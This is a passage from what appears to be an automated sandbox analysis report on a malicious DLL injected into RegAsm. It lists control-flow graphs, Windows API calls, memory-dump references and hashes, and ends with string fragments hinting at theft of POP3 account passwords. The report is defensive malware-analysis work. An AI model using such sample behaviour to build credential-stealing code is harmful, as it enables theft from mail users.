                                                                                                                                                • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModuleProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2905821283-0
                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                              • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                              • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 191 1000c803-1000c80b call 1000c897 194 1000c82d 191->194 195 1000c80d-1000c81a VirtualProtect 191->195 198 1000c82f-1000c833 194->198 196 1000c82c 195->196 197 1000c81c-1000c82a VirtualProtect 195->197 196->194 197->196 199 1000c872 call 1000c877 198->199 200 1000c835-1000c83d GetModuleHandleA 198->200 201 1000c83f-1000c847 200->201 201->201 203 1000c849-1000c84c 201->203 203->198 204 1000c84e-1000c850 203->204 205 1000c852-1000c854 204->205 206 1000c856-1000c85e 204->206 207 1000c85f-1000c865 call 1000c897 205->207 206->207 211 1000c866-1000c86e 207->211 213 1000c870 211->213 213->203
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual$HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519776433-0
                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                              • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                              • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 214 10006acb-10006aff GetCPInfo 215 10006bf5-10006c02 214->215 216 10006b05 214->216 218 10006c08-10006c18 215->218 217 10006b07-10006b11 216->217 217->217 219 10006b13-10006b26 217->219 220 10006c24-10006c2b 218->220 221 10006c1a-10006c22 218->221 222 10006b47-10006b49 219->222 224 10006c3b 220->224 225 10006c2d-10006c34 220->225 223 10006c37-10006c39 221->223 227 10006b28-10006b2f 222->227 228 10006b4b-10006b82 call 100086e4 call 10008a3e 222->228 226 10006c3d-10006c4c 223->226 224->226 225->223 226->218 229 10006c4e-10006c5e call 10002ada 226->229 230 10006b3e-10006b40 227->230 239 10006b87-10006bb2 call 10008a3e 228->239 233 10006b31-10006b33 230->233 234 10006b42-10006b45 230->234 233->234 237 10006b35-10006b3d 233->237 234->222 237->230 242 10006bb4-10006bbe 239->242 243 10006bc0-10006bcc 242->243 244 10006bce-10006bd0 242->244 245 10006bde-10006be5 243->245 246 10006bd2-10006bd7 244->246 247 10006be7 244->247 248 10006bee-10006bf1 245->248 246->245 247->248 248->242 249 10006bf3 248->249 249->229
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                              • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                              • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                              • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                              • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 250 10005f19-10005f3b call 10005c45 252 10005f40-10005f47 250->252 253 10005f70-10005f8a call 10005fa1 LCMapStringW 252->253 254 10005f49-10005f6e 252->254 258 10005f90-10005f9e call 10002ada 253->258 254->258
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String
                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                                                              • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                              • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                              • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                              • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 262 10005d5c-10005d7e call 10005c45 264 10005d83-10005d8a 262->264 265 10005d9b TlsAlloc 264->265 266 10005d8c-10005d99 264->266 267 10005da1-10005daf call 10002ada 265->267 266->267
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc
                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                              • API String ID: 2773662609-671089009
                                                                                                                                              • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                              • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                              • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                              • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 272 10003af1-10003b06 call 10003a82 274 10003b0b-10003b12 272->274 275 10003b24-10003b26 TlsAlloc 274->275 276 10003b14-10003b23 274->276
                                                                                                                                              APIs
                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: try_get_function
                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                              • API String ID: 2742660187-671089009
                                                                                                                                              • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                              • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                              • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                              • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 279 10006e20-10006e44 call 100069f3 282 10006e54-10006e5b 279->282 283 10006e46-10006e4f call 10006a66 279->283 285 10006e5e-10006e64 282->285 290 10007001-10007010 call 10002ada 283->290 287 10006f54-10006f73 call 10002c40 285->287 288 10006e6a-10006e76 285->288 297 10006f76-10006f7b 287->297 288->285 291 10006e78-10006e7e 288->291 294 10006e84-10006e8a 291->294 295 10006f4c-10006f4f 291->295 294->295 299 10006e90-10006e9c IsValidCodePage 294->299 296 10007000 295->296 296->290 300 10006fb2-10006fbc 297->300 301 10006f7d-10006f82 297->301 299->295 302 10006ea2-10006eaf GetCPInfo 299->302 300->297 307 10006fbe-10006fe5 call 100069b5 300->307 303 10006f84-10006f8a 301->303 304 10006faf 301->304 305 10006eb5-10006ed6 call 10002c40 302->305 306 10006f39-10006f3f 302->306 308 10006fa3-10006fa5 303->308 304->300 317 10006ed8-10006edf 305->317 318 10006f29 305->318 306->295 310 10006f41-10006f47 call 10006a66 306->310 320 10006fe6-10006ff5 307->320 313 10006fa7-10006fad 308->313 314 10006f8c-10006f92 308->314 324 10006ffd-10006ffe 310->324 313->301 313->304 314->313 321 10006f94-10006f9f 314->321 322 10006ee1-10006ee6 317->322 323 10006f02-10006f05 317->323 326 10006f2c-10006f34 318->326 320->320 325 10006ff7-10006ff8 call 10006acb 320->325 321->308 322->323 327 10006ee8-10006eee 322->327 329 10006f0a-10006f11 323->329 324->296 325->324 326->325 330 10006ef6-10006ef8 327->330 329->329 331 10006f13-10006f27 call 100069b5 329->331 332 10006ef0-10006ef5 330->332 333 10006efa-10006f00 330->333 331->326 332->330 333->322 333->323
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                              • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                              • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                              • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                              • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 336 10006c5f-10006c89 call 10005af6 call 10006d7e call 100069f3 343 10006c8b-10006c8d 336->343 344 10006c8f-10006ca4 call 100056d0 336->344 345 10006ce2-10006ce5 343->345 348 10006cd4 344->348 349 10006ca6-10006cbc call 10006e20 344->349 351 10006cd6-10006ce1 call 1000571e 348->351 352 10006cc1-10006cc7 349->352 351->345 354 10006ce6-10006cea 352->354 355 10006cc9-10006cce call 10006368 352->355 357 10006cf1-10006cfc 354->357 358 10006cec call 10007bbc 354->358 355->348 361 10006d13-10006d2d 357->361 362 10006cfe-10006d08 357->362 358->357 361->351 365 10006d2f-10006d36 361->365 362->361 364 10006d0a-10006d12 call 1000571e 362->364 364->361 365->351 367 10006d38-10006d4f call 100068c9 365->367 367->351 371 10006d51-10006d5b 367->371 371->351
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                              • _free.LIBCMT ref: 10006CD7
                                                                                                                                              • _free.LIBCMT ref: 10006D0D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2991157371-0
                                                                                                                                              • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                              • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                              • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                              • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 372 10001eec-10001ef5 373 10001ef7-10001efa 372->373 374 10001f2a-10001f35 dllmain_crt_process_detach 372->374 376 10001f1c-10001f28 dllmain_crt_process_attach 373->376 377 10001efc-10001eff 373->377 375 10001f3a 374->375 378 10001f3b-10001f3c 375->378 376->375 379 10001f01-10001f04 377->379 380 10001f12 call 100023ec 377->380 382 10001f06-10001f09 379->382 383 10001f0b-10001f10 call 1000240b 379->383 384 10001f17-10001f1a 380->384 382->378 383->384 384->378
                                                                                                                                              APIs
                                                                                                                                              • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                              • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3750050125-0
                                                                                                                                              • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                              • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                              • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                              • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 387 100038e8-100038ed call 10003af1 389 100038f2-100038fb 387->389 390 10003900-1000390f call 10003ba2 389->390 391 100038fd-100038ff 389->391 394 10003911-10003916 call 1000391b 390->394 395 10003918-1000391a 390->395 394->391
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 806969131-0
                                                                                                                                              • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                              • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                              • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                              • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                              APIs
                                                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __crt_fast_encode_pointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3768137683-0
                                                                                                                                              • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                              • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                              • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                              • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                              • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                              • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                              • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                              • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                              • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                              • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                              • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                              • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                              • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .
                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                              • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                              • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                              • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                              • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HeapProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                              • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                              • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                              • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                              • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strlen
                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                              • API String ID: 4218353326-3023110444
